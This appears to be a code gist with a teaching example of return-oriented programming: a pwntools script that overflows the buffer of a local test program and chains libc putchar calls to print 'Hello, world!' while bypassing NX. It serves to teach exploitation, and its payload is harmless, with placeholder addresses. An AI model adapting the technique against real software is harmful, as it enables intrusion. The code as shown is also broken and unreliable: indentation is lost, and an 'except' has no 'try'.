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Created October 12, 2019 21:58
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Return-oriented programming example (ROP) as in traditional Hello world! style
# Example implementation to produce ROP chain for vulnerable program,
# and print 'Hello, world!'
# Program is taking input as argument, as has buffer overflow vulneralibity
# We are using CTP framework 'pwntools'
# We are expecting, that ASLR and stack canaries are disabled. Bypassing NX bit
from pwn import log, context
from pwnlib.tubes.process import process
from pwnlib.util.packing import p32, pack
from pwnlib.exception import PwnlibException
context(arch='i386', os='linux')
# libc entry address, varying based on machine
libc_entry = 0x00000000
# NOTE that you might have different offsets, depending on libc version
# and compiler settings
offset_ppr = 0x00000000 # pop/pop/ret gadget
offset_pr = 0x00000000 # pop ebx;ret
# Offset address of libc exit function
offset_exit = 0x00000000
# Offset address of libc putchar function
offset_putchar = 0x00000000
def main():
# payload = ""
padChar2 = b"\x90"
padSize = 32
# Initial payload
hello = "\nHello, world!\n\n" # We are using putchar function from libc
# as example to chain multiple function calls/gadgets
# For each character in our phrase, there is putchar call
payload = padChar2 * padSize
for char in hello: # Generate payload for printing 'Hello, world!'
# payload += p32(libc_entry + offset_putchar) # function p32 changes
payload += p32(libc_entry + offset_putchar)
# memoryaddress to correct format (reversed and opcoded)
# whattodo after = pop/ret gadget
payload += p32(libc_entry + offset_pr)
# pwntools function pack, is packing our input to 32-bit memory
# address with correct syntax. Ord is changing character to ASCII code
payload += pack(ord(char), 32, 'little', # function arguments
False).replace(b"\x00", b"\xff")
# Replacing nulls with '\xff', which are generated in by packing to
# fullfil 32-bit size
payload += p32(libc_entry + offset_pr)
payload += p32(0xffffffff) # Some address, we do not care, we are exiting
# so value does not matter.
payload += p32(libc_entry + offset_exit)
# Writing payload to txt file just in case,
# if we want to run program without script
f = open("payload.txt", "w+")
# C program is using payload as args
p = process(["../vuln_progs/Overflow", payload])
except PwnlibException:
print("Nulls in arguments.")
if __name__ == "__main__":
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